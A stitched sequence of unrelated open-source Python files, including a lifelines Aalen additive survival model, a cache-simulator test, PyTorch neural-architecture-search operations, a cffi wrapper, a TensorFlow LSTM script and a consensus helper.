>>> 'age': [4, 3, 9, 8, 7, 4, 4, 3, 2, 5, 6, 7],
>>> })
>>>
>>> aaf = AalenAdditiveFitter()
>>> aaf.fit(df, 'T', 'E')
>>> aaf.predict_median(df)
>>> aaf.print_summary()
"""
self._time_fit_was_called = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S") + " UTC"
df = df.copy()
self.duration_col = duration_col
self.event_col = event_col
self.weights_col = weights_col
self._n_examples = df.shape[0]
X, T, E, weights = self._preprocess_dataframe(df)
self.durations = T.copy()
self.event_observed = E.copy()
self.weights = weights.copy()
self._norm_std = X.std(0)
        # if we included an intercept, make sure we do not divide by zero when normalizing.
if self.fit_intercept:
self._norm_std["_intercept"] = 1.0
else:
# a _intercept was provided
self._norm_std[self._norm_std < 1e-8] = 1.0
self.hazards_, self.cumulative_hazards_, self.cumulative_variance_ = self._fit_model(
normalize(X, 0, self._norm_std), T, E, weights, show_progress
)
self.hazards_ /= self._norm_std
self.cumulative_hazards_ /= self._norm_std
self.cumulative_variance_ /= self._norm_std
self.confidence_intervals_ = self._compute_confidence_intervals()
self._index = self.hazards_.index
self._predicted_hazards_ = self.predict_cumulative_hazard(X).iloc[-1].values.ravel()
return self
def _fit_model(self, X, T, E, weights, show_progress):
columns = X.columns
index = np.sort(np.unique(T[E]))
hazards_, variance_hazards_, stop = self._fit_model_to_data_batch(
X.values, T.values, E.values, weights.values, show_progress
)
hazards = pd.DataFrame(hazards_, columns=columns, index=index).iloc[:stop]
cumulative_hazards_ = hazards.cumsum()
cumulative_variance_hazards_ = (
pd.DataFrame(variance_hazards_, columns=columns, index=index).iloc[:stop].cumsum()
)
return hazards, cumulative_hazards_, cumulative_variance_hazards_
def _fit_model_to_data_batch(self, X, T, E, weights, show_progress):
n, d = X.shape
# we are mutating values of X, so copy it.
X = X.copy()
# iterate over all the unique death times
unique_death_times = np.sort(np.unique(T[E]))
n_deaths = unique_death_times.shape[0]
total_observed_exits = 0
hazards_ = np.zeros((n_deaths, d))
variance_hazards_ = np.zeros((n_deaths, d))
v = np.zeros(d)
start = time.time()
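        # fold the case weights into the design matrix (rows scaled by sqrt(weight)) before the per-event-time regressions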
W = np.sqrt(weights)
X = W[:, None] * X
for i, t in enumerate(unique_death_times):
exits = T == t
deaths = exits & E
try:
v, V = lr(X, W * deaths, c1=self.coef_penalizer, c2=self.smoothing_penalizer, offset=v, ix=deaths)
except LinAlgError:
warnings.warn(
"Linear regression error at index=%d, time=%.3f. Try increasing the coef_penalizer value." % (i, t),
ConvergenceWarning,
)
v = np.zeros_like(v)
V = np.zeros_like(V)
hazards_[i, :] = v
variance_hazards_[i, :] = (V ** 2).sum(1)
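            # zero out the rows of subjects exiting at time t so they no longer contribute to later regressions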
X[exits, :] = 0
            if show_progress and n_deaths >= 10 and i % (n_deaths // 10) == 0:
print("\rIteration %d/%d, seconds_since_start = %.2f" % (i + 1, n_deaths, time.time() - start), end="")
last_iteration = i + 1
# terminate early when there are less than (3 * d) subjects left, where d does not include the intercept.
# the value 3 if from R survival lib.
if (3 * (d - 1)) >= n - total_observed_exits:
if show_progress:
print("Terminating early due to too few subjects remaining. This is expected behaviour.")
break
total_observed_exits += exits.sum()
if show_progress:
print("Convergence completed.")
return hazards_, variance_hazards_, last_iteration
def _preprocess_dataframe(self, df):
n, _ = df.shape
df = df.sort_values(by=self.duration_col)
# Extract time and event
T = df.pop(self.duration_col)
E = df.pop(self.event_col) if (self.event_col is not None) else pd.Series(np.ones(n), index=df.index, name="E")
W = (
df.pop(self.weights_col)
if (self.weights_col is not None)
else pd.Series(np.ones((n,)), index=df.index, name="weights")
)
# check to make sure their weights are okay
if self.weights_col:
if (W.astype(int) != W).any():
warnings.warn(
"""It appears your weights are not integers, possibly propensity or sampling scores then?
It's important to know that the naive variance estimates of the coefficients are biased."
""",
StatisticalWarning,
)
if (W <= 0).any():
raise ValueError("values in weight column %s must be positive." % self.weights_col)
X = df.astype(float)
T = T.astype(float)
check_nans_or_infs(E)
E = E.astype(bool)
self._check_values(df, T, E)
if self.fit_intercept:
assert (
"_intercept" not in df.columns
), "_intercept is an internal lifelines column, please rename your column first."
X["_intercept"] = 1.0
return X, T, E, W
def predict_cumulative_hazard(self, X):
"""
Returns the hazard rates for the individuals
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame. If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
"""
n = X.shape[0]
X = X.astype(float)
cols = _get_index(X)
if isinstance(X, pd.DataFrame):
order = self.cumulative_hazards_.columns
order = order.drop("_intercept") if self.fit_intercept else order
X_ = X[order].values
elif isinstance(X, pd.Series):
return self.predict_cumulative_hazard(X.to_frame().T)
else:
X_ = X
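        # append the constant intercept column so the prediction design matrix matches the one used during fitting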
X_ = X_ if not self.fit_intercept else np.c_[X_, np.ones((n, 1))]
timeline = self._index
individual_cumulative_hazards_ = pd.DataFrame(
np.dot(self.cumulative_hazards_, X_.T), index=timeline, columns=cols
)
return individual_cumulative_hazards_
def _check_values(self, X, T, E):
check_for_numeric_dtypes_or_raise(X)
check_nans_or_infs(T)
check_nans_or_infs(X)
def predict_survival_function(self, X, times=None):
"""
Returns the survival functions for the individuals
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
times:
Not implemented yet
"""
return np.exp(-self.predict_cumulative_hazard(X))
def predict_percentile(self, X, p=0.5):
"""
Returns the median lifetimes for the individuals.
http://stats.stackexchange.com/questions/102986/percentile-loss-functions
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
p: float
default: 0.5
"""
index = _get_index(X)
return qth_survival_times(p, self.predict_survival_function(X)[index]).T
def predict_median(self, X):
"""
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
Returns the median lifetimes for the individuals
"""
return self.predict_percentile(X, 0.5)
def predict_expectation(self, X):
"""
Compute the expected lifetime, E[T], using covariates X.
Parameters
----------
X: a (n,d) covariate numpy array or DataFrame
If a DataFrame, columns
can be in any order. If a numpy array, columns must be in the
same order as the training data.
Returns the expected lifetimes for the individuals
"""
index = _get_index(X)
t = self._index
return pd.DataFrame(trapz(self.predict_survival_function(X)[index].values.T, t), index=index)
def _compute_confidence_intervals(self):
ci = 100 * (1 - self.alpha)
z = inv_normal_cdf(1 - self.alpha / 2)
std_error = np.sqrt(self.cumulative_variance_)
return pd.concat(
{
"%g%% lower-bound" % ci: self.cumulative_hazards_ - z * std_error,
"%g%% upper-bound" % ci: self.cumulative_hazards_ + z * std_error,
}
)
def plot(self, columns=None, loc=None, iloc=None, **kwargs):
""""
A wrapper around plotting. Matplotlib plot arguments can be passed in, plus:
Parameters
-----------
columns: string or list-like, optional
If not empty, plot a subset of columns from the ``cumulative_hazards_``. Default all.
loc:
iloc: slice, optional
specify a location-based subsection of the curves to plot, ex:
``.plot(iloc=slice(0,10))`` will plot the first 10 time points.
"""
from matplotlib import pyplot as plt
assert loc is None or iloc is None, "Cannot set both loc and iloc in call to .plot"
def shaded_plot(ax, x, y, y_upper, y_lower, **kwargs):
base_line, = ax.plot(x, y, drawstyle="steps-post", **kwargs)
ax.fill_between(x, y_lower, y2=y_upper, alpha=0.25, color=base_line.get_color(), linewidth=1.0, step="post")
def create_df_slicer(loc, iloc):
get_method = "loc" if loc is not None else "iloc"
if iloc is None and loc is None:
user_submitted_ix = slice(0, None)
else:
user_submitted_ix = loc if loc is not None else iloc
return lambda df: getattr(df, get_method)[user_submitted_ix]
subset_df = create_df_slicer(loc, iloc)
if not columns:
columns = self.cumulative_hazards_.columns
else:
columns = _to_list(columns)
set_kwargs_ax(kwargs)
ax = kwargs.pop("ax")
x = subset_df(self.cumulative_hazards_).index.values.astype(float)
for column in columns:
ci = (1 - self.alpha) * 100
y = subset_df(self.cumulative_hazards_[column]).values
index = subset_df(self.cumulative_hazards_[column]).index
y_upper = subset_df(self.confidence_intervals_[column].loc["%g%% upper-bound" % ci]).values
y_lower = subset_df(self.confidence_intervals_[column].loc["%g%% lower-bound" % ci]).values
shaded_plot(ax, x, y, y_upper, y_lower, label=column, **kwargs)
plt.hlines(0, index.min() - 1, index.max(), color="k", linestyles="--", alpha=0.5)
ax.legend()
return ax
def smoothed_hazards_(self, bandwidth=1):
"""
Using the epanechnikov kernel to smooth the hazard function, with sigma/bandwidth
"""
timeline = self._index.values
return pd.DataFrame(
np.dot(epanechnikov_kernel(timeline[:, None], timeline, bandwidth), self.hazards_.values),
columns=self.hazards_.columns,
index=timeline,
)
@property
def score_(self):
"""
The concordance score (also known as the c-index) of the fit. The c-index is a generalization of the ROC AUC
to survival data, including censorships.
For this purpose, the ``score_`` is a measure of the predictive accuracy of the fitted model
onto the training dataset. It's analogous to the R^2 in linear models.
"""
# pylint: disable=access-member-before-definition
if hasattr(self, "_predicted_hazards_"):
self._concordance_score_ = concordance_index(self.durations, -self._predicted_hazards_, self.event_observed)
del self._predicted_hazards_
return self._concordance_score_
return self._concordance_score_
def _compute_slopes(self):
def _univariate_linear_regression_without_intercept(X, Y, weights):
# normally (weights * X).dot(Y) / X.dot(weights * X), but we have a slightly different form here.
beta = X.dot(Y) / X.dot(weights * X)
errors = Y.values - np.outer(X, beta)
var = (errors ** 2).sum(0) / (Y.shape[0] - 2) / X.dot(weights * X)
return beta, np.sqrt(var)
weights = survival_table_from_events(self.durations, self.event_observed).loc[self._index, "at_risk"].values
y = (weights[:, None] * self.hazards_).cumsum()
X = self._index.values
betas, se = _univariate_linear_regression_without_intercept(X, y, weights)
return pd.Series(betas, index=y.columns), pd.Series(se, index=y.columns)
@property
def summary(self):
"""Summary statistics describing the fit.
Returns
-------
df : DataFrame
"""
df = pd.DataFrame(index=self.cumulative_hazards_.columns)
betas, se = self._compute_slopes()
df["slope(coef)"] = betas
df["se(slope(coef))"] = se
return df
def print_summary(self, decimals=2, **kwargs):
"""
Print summary statistics describing the fit, the coefficients, and the error bounds.
Parameters
-----------
decimals: int, optional (default=2)
specify the number of decimal places to show
kwargs:
print additional meta data in the output (useful to provide model names, dataset names, etc.) when comparing
multiple outputs.
"""
# Print information about data first
justify = string_justify(18)
print(self)
print("{} = '{}'".format(justify("duration col"), self.duration_col))
print("{} = '{}'".format(justify("event col"), self.event_col))
if self.weights_col:
print("{} = '{}'".format(justify("weights col"), self.weights_col))
if self.coef_penalizer > 0:
print("{} = '{}'".format(justify("coef penalizer"), self.coef_penalizer))
if self.smoothing_penalizer > 0:
print("{} = '{}'".format(justify("smoothing penalizer"), self.smoothing_penalizer))
print("{} = {}".format(justify("number of subjects"), self._n_examples))
print("{} = {}".format(justify("number of events"), self.event_observed.sum()))
print("{} = {}".format(justify("time fit was run"), self._time_fit_was_called))
for k, v in kwargs.items():
print("{} = {}\n".format(justify(k), v))
print(end="\n")
print("---")
df = self.summary
print(
df.to_string(
float_format=format_floats(decimals),
formatters={"p": format_p_value(decimals), "exp(coef)": format_exp_floats(decimals)},
)
)
# Significance code explanation
print("---")
print("Concordance = {:.{prec}f}".format(self.score_, prec=decimals))
|
the-stack_106_23319 | #!/usr/bin/env python3
import copy
import nose.tools as nose
from cachesimulator.cache import Cache
class TestSetBlock(object):
"""set_block should behave correctly in all cases"""
def reset(self):
self.cache = Cache({
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1101'},
{'tag': '1110'}
]
})
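        # (index, tag) pairs, ordered from least to most recently used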
self.recently_used_addrs = [
('100', '1100'),
('010', '1101'),
('010', '1110')
]
self.new_entry = {'tag': '1111'}
def test_empty_set(self):
"""set_block should add new block if index set is empty"""
self.reset()
self.cache['010'][:] = []
self.cache.recently_used_addrs = []
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [{'tag': '1111'}]
})
def test_lru_replacement(self):
"""set_block should perform LRU replacement as needed"""
self.reset()
self.cache.recently_used_addrs = self.recently_used_addrs
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1111'},
{'tag': '1110'}
]
})
def test_mru_replacement(self):
"""set_block should optionally perform MRU replacement as needed"""
self.reset()
self.cache.recently_used_addrs = self.recently_used_addrs
self.cache.set_block(
replacement_policy='mru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_equal(self.cache, {
'010': [
{'tag': '1000'},
{'tag': '1100'},
{'tag': '1101'},
{'tag': '1111'}
]
})
def test_no_replacement(self):
"""set_block should not perform replacement if there are no recents"""
self.reset()
original_cache = copy.deepcopy(self.cache)
self.cache.recently_used_addrs = []
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_is_not(self.cache, original_cache)
nose.assert_equal(self.cache, original_cache)
|
the-stack_106_23320 | import torch
import torch.nn as nn
# OPS is a set of layers with same input/output channel.
OPS = {
'none': lambda C, stride, affine: Zero(stride),
'avg_pool_3x3': lambda C, stride, affine: nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False),
'max_pool_3x3': lambda C, stride, affine: nn.MaxPool2d(3, stride=stride, padding=1),
'skip_connect': lambda C, stride, affine: Identity() if stride == 1 else FactorizedReduce(C, C, affine=affine),
'sep_conv_3x3': lambda C, stride, affine: SepConv(C, C, 3, stride, 1, affine=affine),
'sep_conv_5x5': lambda C, stride, affine: SepConv(C, C, 5, stride, 2, affine=affine),
'sep_conv_7x7': lambda C, stride, affine: SepConv(C, C, 7, stride, 3, affine=affine),
'dil_conv_3x3': lambda C, stride, affine: DilConv(C, C, 3, stride, 2, 2, affine=affine),
'dil_conv_5x5': lambda C, stride, affine: DilConv(C, C, 5, stride, 4, 2, affine=affine),
'conv_7x1_1x7': lambda C, stride, affine: nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C, C, (1, 7), stride=(1, stride), padding=(0, 3), bias=False),
nn.Conv2d(C, C, (7, 1), stride=(stride, 1), padding=(3, 0), bias=False),
nn.BatchNorm2d(C, affine=affine)
),
}
class ReLUConvBN(nn.Module):
"""
Stack of relu-conv-bn
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding:
:param affine:
"""
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride, padding=padding, bias=False),
nn.BatchNorm2d(C_out, affine=affine)
)
def forward(self, x):
return self.op(x)
class DilConv(nn.Module):
"""
relu-dilated conv-bn
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding: 2/4
:param dilation: 2
:param affine:
"""
super(DilConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride, padding=padding,
dilation=dilation,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out, affine=affine),
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
"""
    Depthwise-separable convolution implemented via PyTorch's groups parameter.
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding: 1/2
:param affine:
"""
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride, padding=padding,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_in, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_in, affine=affine),
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=1, padding=padding,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out, affine=affine),
)
def forward(self, x):
return self.op(x)
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class Zero(nn.Module):
"""
    Zero operation: returns an all-zero tensor, spatially subsampled by stride.
"""
def __init__(self, stride):
super(Zero, self).__init__()
self.stride = stride
def forward(self, x):
if self.stride == 1:
return x.mul(0.)
return x[:, :, ::self.stride, ::self.stride].mul(0.)
class FactorizedReduce(nn.Module):
"""
reduce feature maps height/width by half while keeping channel same
"""
def __init__(self, C_in, C_out, affine=True):
"""
:param C_in:
:param C_out:
:param affine:
"""
super(FactorizedReduce, self).__init__()
assert C_out % 2 == 0
self.relu = nn.ReLU(inplace=False)
# this conv layer operates on even pixels to produce half width, half channels
self.conv_1 = nn.Conv2d(C_in, C_out // 2, 1, stride=2, padding=0, bias=False)
# this conv layer operates on odd pixels (because of code in forward()) to produce half width, half channels
self.conv_2 = nn.Conv2d(C_in, C_out // 2, 1, stride=2, padding=0, bias=False)
self.bn = nn.BatchNorm2d(C_out, affine=affine)
def forward(self, x):
x = self.relu(x)
# x: torch.Size([32, 32, 32, 32])
# conv1: [b, c_out//2, d//2, d//2]
# conv2: []
# out: torch.Size([32, 32, 16, 16])
# concate two half channels to produce same number of channels as before but with output as only half the width
out = torch.cat([self.conv_1(x), self.conv_2(x[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
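# Minimal usage sketch (not part of the original module): pick an op from the OPS
# registry and run a dummy tensor through it to check the expected output shape.
if __name__ == '__main__':
    op = OPS['sep_conv_3x3'](16, 2, True)  # C=16 channels, stride 2, affine batch norm
    y = op(torch.randn(2, 16, 32, 32))
    print(y.shape)  # stride 2 halves the spatial dims: torch.Size([2, 16, 16, 16])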
|
the-stack_106_23322 | """
cluster_toolkit is a module for computing galaxy cluster models.
"""
import cffi
import glob
import os
import numpy as np
__author__ = "Tom McClintock <[email protected]>"
cluster_toolkit_dir = os.path.dirname(__file__)
include_dir = os.path.join(cluster_toolkit_dir,'include')
lib_file = os.path.join(cluster_toolkit_dir,'_cluster_toolkit.so')
# Some installation (e.g. Travis with python 3.x)
# name this e.g. _cluster_toolkit.cpython-34m.so,
# so if the normal name doesn't exist, look for something else.
# Note: we ignore this if we are building the docs on RTD
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not os.path.exists(lib_file) and not on_rtd:
alt_files = glob.glob(os.path.join(os.path.dirname(__file__),'_cluster_toolkit*.so'))
if len(alt_files) == 0:
raise IOError("No file '_cluster_toolkit.so' found in %s"%cluster_toolkit_dir)
if len(alt_files) > 1:
raise IOError("Multiple files '_cluster_toolkit*.so' found in %s: %s"%(cluster_toolkit_dir,alt_files))
lib_file = alt_files[0]
_ffi = cffi.FFI()
for file_name in glob.glob(os.path.join(include_dir, '*.h')):
_ffi.cdef(open(file_name).read())
_ffi.cdef('const char * gsl_strerror(const int gsl_errno);')
_lib = _ffi.dlopen(lib_file)
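# GSL's default error handler aborts the process; turn it off and surface errors via _handle_gsl_error instead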
_lib.gsl_set_error_handler_off()
def _handle_gsl_error(err, fn):
if err != 0:
msg = _ffi.string(_lib.gsl_strerror(err))
raise Exception('GSL error in function {}: {}'.format(fn.__name__, msg))
class _ArrayWrapper:
def __init__(self, obj, name=None, allow_multidim=False):
self.arr = np.require(obj, dtype=np.float64,
requirements=['C_CONTIGUOUS'])
self.scalar = self.arr.ndim == 0
self.ndim = self.arr.ndim
self.shape = self.arr.shape
if (self.ndim > 1) and not allow_multidim:
if name is not None:
raise ValueError('{} cannot be >1 dim'.format(name))
raise ValueError('array cannot be >1 dim')
def cast(self):
return _ffi.cast('double*', self.arr.ctypes.data)
def finish(self):
if self.scalar:
return self.arr[()]
return self.arr
def __len__(self):
if self.scalar:
return 1
return self.arr.size
@classmethod
def zeros_like(cls, obj):
if isinstance(obj, _ArrayWrapper):
return cls(np.zeros_like(obj.arr))
return cls(np.zeros_like(obj))
@classmethod
def zeros(cls, shape):
return cls(np.zeros(shape, dtype=np.double))
@classmethod
def ones_like(cls, obj):
return cls(np.ones_like(obj))
@classmethod
def ones(cls, shape):
return cls(np.ones(shape, dtype=np.double))
from . import averaging, bias, boostfactors, concentration, deltasigma, density, exclusion, massfunction, miscentering, peak_height, profile_derivatives, sigma_reconstruction, xi
|
the-stack_106_23323 | import re
class Star:
def __init__(self, x, y, dx, dy):
# print(x, y, dx, dy)
self.x = int(x)
self.y = int(y)
self.dx = int(dx)
self.dy = int(dy)
def step(self):
self.x += self.dx
self.y += self.dy
def __repr__(self):
return 'x={} y={}'.format(self.x, self.y)
stars = []
def make_grid(grid_min, s):
min_x = min(stars, key=lambda star: star.x).x
max_x = max(stars, key=lambda star: star.x).x
min_y = min(stars, key=lambda star: star.y).y
max_y = max(stars, key=lambda star: star.y).y
# print(min_x, max_x, min_y, max_y)
if s == 10144:
star_list = [['.' for y in range(max_y + 1)] for x in range(max_x + 1)]
for star in stars:
star_list[star.x][star.y] = '#'
for row in range(len(star_list) - 1, 0, -1):
print(star_list[row][100:])
print(min_x, max_x, min_y, max_y)
temp_min = abs(min_x - max_x) * abs(min_y - max_y)
# print(temp_min)
if temp_min < grid_min[0]:
grid_min[0] = temp_min
grid_min[1] = s
return grid_min
with open('input.txt', 'r') as f:
data = f.read().splitlines()
for line in data:
stars.append(
            Star(*re.match(r'position=<\s*(-?\d*),\s*(-?\d*)>\s*velocity=<\s*(-?\d*),\s*(-?\d*)>', line).groups()))
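# grid_min holds the smallest bounding-box area seen so far and the second at which it occurred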
grid_min = [10000000000, 0]
for s in range(10200):
grid_min = make_grid(grid_min, s)
for star in stars:
star.step()
print(grid_min)
|
the-stack_106_23324 | import numpy as np
import tensorflow as tf
from tensorflow.contrib import rnn
import random
import collections
import time
from tensorflow.python.ops import array_ops
from tensorflow.contrib.rnn.python.ops import rnn_cell
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import init_ops
from tensorflow.contrib.rnn import GRUCell
from org.mk.training.dl.common import input_one_hot
from org.mk.training.dl.util import get_rel_save_file
import sys
# data I/O
train_file=sys.argv[1]
data = open(train_file, 'r').read()
# Parameters
learning_rate = 0.001
#training_iters = 50000
training_iters = 200
display_step = 100
n_input = 3
# number of units in RNN cell
n_hidden = 5
rnd=np.random.RandomState(42)
def read_data(fname):
with open(fname) as f:
data = f.readlines()
data = [x.strip() for x in data]
data = [data[i].lower().split() for i in range(len(data))]
data = np.array(data)
data = np.reshape(data, [-1, ])
return data
train_data = read_data(train_file)
def build_dataset(words):
count = collections.Counter(words).most_common()
dictionary = dict()
sortedwords=sorted(set(words))
for i,word in enumerate(sortedwords):
dictionary[word] = i
reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return dictionary, reverse_dictionary
dictionary, reverse_dictionary = build_dataset(train_data)
vocab_size = len(dictionary)
# Place holder for Mini batch input output
x = tf.placeholder("float", [None, n_input, vocab_size])
y = tf.placeholder("float", [None, vocab_size])
# RNN output node weights and biases
weights = {
'out': tf.Variable([[-0.09588283, -2.2044923 , -0.74828255, 0.14180686, -0.32083616,
-0.9444244 , 0.06826905, -0.9728962 , -0.18506959, 1.0618515 ],
[ 1.156649 , 3.2738173 , -1.2556943 , -0.9079511 , -0.82127047,
-1.1448543 , -0.60807484, -0.5885713 , 1.0378786 , -0.7088431 ],
[ 1.006477 , 0.28033388, -0.1804534 , 0.8093307 , -0.36991575,
0.29115433, -0.01028167, -0.7357091 , 0.92254084, -0.10753923],
[ 0.19266959, 0.6108299 , 2.2495654 , 1.5288974 , 1.0172302 ,
1.1311738 , 0.2666629 , -0.30611828, -0.01412263, 0.44799015],
[ 0.19266959, 0.6108299 , 2.2495654 , 1.5288974 , 1.0172302 ,
1.1311738 , 0.2666629 , -0.30611828, -0.01412263, 0.44799015]]
)
}
biases = {
'out': tf.Variable([ 0.1458478 , -0.3660951 , -2.1647317 , -1.9633691 , -0.24532059,
0.14005205, -1.0961286 , -0.43737876, 0.7028531 , -1.8481724 ]
)
}
#works with 2 dimension hence easy but not optimal
"""
def RNN(x, weights, biases):
with variable_scope.variable_scope(
"other", initializer=init_ops.constant_initializer(0.1)) as vs:
x = tf.unstack(x, n_input, 1)
cell = rnn_cell.LayerNormBasicLSTMCell(n_hidden, layer_norm=False)
outputs, states = rnn.static_rnn(cell, x, dtype=tf.float32)
return tf.matmul(outputs[-1], weights['out']) + biases['out'],outputs,states,weights['out'],biases['out']
"""
#Same as above
#works with 3 dimensions. Line 112 takes care of extracting last (h*wy=by) in 2 dimensions
def RNN(x, weights, biases):
with variable_scope.variable_scope(
"other", initializer=init_ops.constant_initializer(0.1)) as vs:
cell = rnn_cell.LayerNormBasicLSTMCell(n_hidden, layer_norm=False)
outputs, states = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)
return tf.expand_dims(tf.matmul(outputs[-1] , weights['out'])[-1],0) + biases['out'],outputs[-1],states,weights['out'],biases['out']
pred,output,state,weights_out,biases_out = RNN(x, weights, biases)
# Loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
grads_and_vars_tf_style = optimizer.compute_gradients(cost)
train_tf_style = optimizer.apply_gradients(grads_and_vars_tf_style)
# Model evaluation
correct_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
global_step = tf.Variable(0, name='global_step', trainable=False)
# Initializing the variables
init = tf.global_variables_initializer()
projectdir="rnn_words"
start_time = time.time()
def elapsed(sec):
if sec<60:
return str(sec) + " sec"
elif sec<(60*60):
return str(sec/60) + " min"
else:
return str(sec/(60*60)) + " hr"
# Launch the graph
saver = tf.train.Saver(max_to_keep=200)
with tf.Session() as session:
session.run(init)
step = 0
offset =2
end_offset = n_input + 1
acc_total = 0
loss_total = 0
print ("offset:",offset)
summary_writer = tf.summary.FileWriter(get_rel_save_file(projectdir),graph=session.graph)
while step < training_iters:
if offset > (len(train_data)-end_offset):
offset = rnd.randint(0, n_input+1)
print("offset:", offset)
symbols_in_keys = [ input_one_hot(dictionary[ str(train_data[i])],vocab_size) for i in range(offset, offset+n_input) ]
symbols_in_keys = np.reshape(np.array(symbols_in_keys), [-1, n_input,vocab_size])
symbols_out_onehot=input_one_hot(dictionary[str(train_data[offset+n_input])],vocab_size)
symbols_out_onehot = np.reshape(symbols_out_onehot,[1,-1])
tfgrads_and_vars_tf_style, _,acc, loss, onehot_pred,tfoutput,tfstate,tfout_weights,tfbiases_out = session.run([grads_and_vars_tf_style,train_tf_style, accuracy, cost, pred,output,state,weights_out,biases_out], \
feed_dict={x: symbols_in_keys, y: symbols_out_onehot})
loss_total += loss
acc_total += acc
print("tfoutput:",tfoutput," tfstate:",tfstate)
print("onehot_pred:",onehot_pred)
print("loss:",loss)
print("tfgrads_and_vars_tf_style:",tfgrads_and_vars_tf_style)
if (step+1) % display_step == 0:
print("Iter= " + str(step+1) + ", Average Loss= " + \
"{:.6f}".format(loss_total/display_step) + ", Average Accuracy= " + \
"{:.2f}%".format(100*acc_total/display_step))
acc_total = 0
loss_total = 0
symbols_in = [train_data[i] for i in range(offset, offset + n_input)]
symbols_out = train_data[offset + n_input]
symbols_out_pred = reverse_dictionary[int(tf.argmax(onehot_pred, 1).eval())]
saver.save(session,
get_rel_save_file(projectdir)+ '%04d' % (step+1), global_step=global_step)
print("%s - Actual word:[%s] vs Predicted word:[%s]" % (symbols_in,symbols_out,symbols_out_pred))
step += 1
offset += (n_input+1)
print("Optimization Finished!")
print("Elapsed time: ", elapsed(time.time() - start_time))
|
the-stack_106_23325 | from typing import Optional, Tuple, Union
from fibo.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from fibo.types.blockchain_format.reward_chain_block import RewardChainBlock, RewardChainBlockUnfinished
from fibo.types.blockchain_format.sized_bytes import bytes32
from fibo.util.ints import uint64
def iters_from_block(
constants,
reward_chain_block: Union[RewardChainBlock, RewardChainBlockUnfinished],
sub_slot_iters: uint64,
difficulty: uint64,
) -> Tuple[uint64, uint64]:
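    """Return the signage-point and infusion-point iteration counts implied by a reward chain block."""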
if reward_chain_block.challenge_chain_sp_vdf is None:
assert reward_chain_block.signage_point_index == 0
cc_sp: bytes32 = reward_chain_block.pos_ss_cc_challenge_hash
else:
cc_sp = reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
quality_string: Optional[bytes32] = reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants,
reward_chain_block.pos_ss_cc_challenge_hash,
cc_sp,
)
assert quality_string is not None
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
reward_chain_block.proof_of_space.size,
difficulty,
cc_sp,
)
return (
calculate_sp_iters(constants, sub_slot_iters, reward_chain_block.signage_point_index),
calculate_ip_iters(
constants,
sub_slot_iters,
reward_chain_block.signage_point_index,
required_iters,
),
)
|
the-stack_106_23326 | from typing import Tuple, List
class O_equationset:
"""
the equationset as given by equation (4) defined by different non-negative integers
"""
def __init__(self, l: int, W: int, a_i: List[int], b_i: List[int]):
self.l = l
self.W = W
self.a_i = a_i
self.b_i = b_i
def __contains__(self, item):
"""
check whether the O_equationset contains item
:param item: the item to check
:return: bool
"""
if item < self.l:
return False
for a in self.a_i:
if (item - a) % self.W == 0:
return False
for b in self.b_i:
if item == b:
return False
return True
class Un:
"""
the complete representation of Un required in the BoundedCoverWObstacles sub-routine
"""
def __init__(self, g, complement):
"""
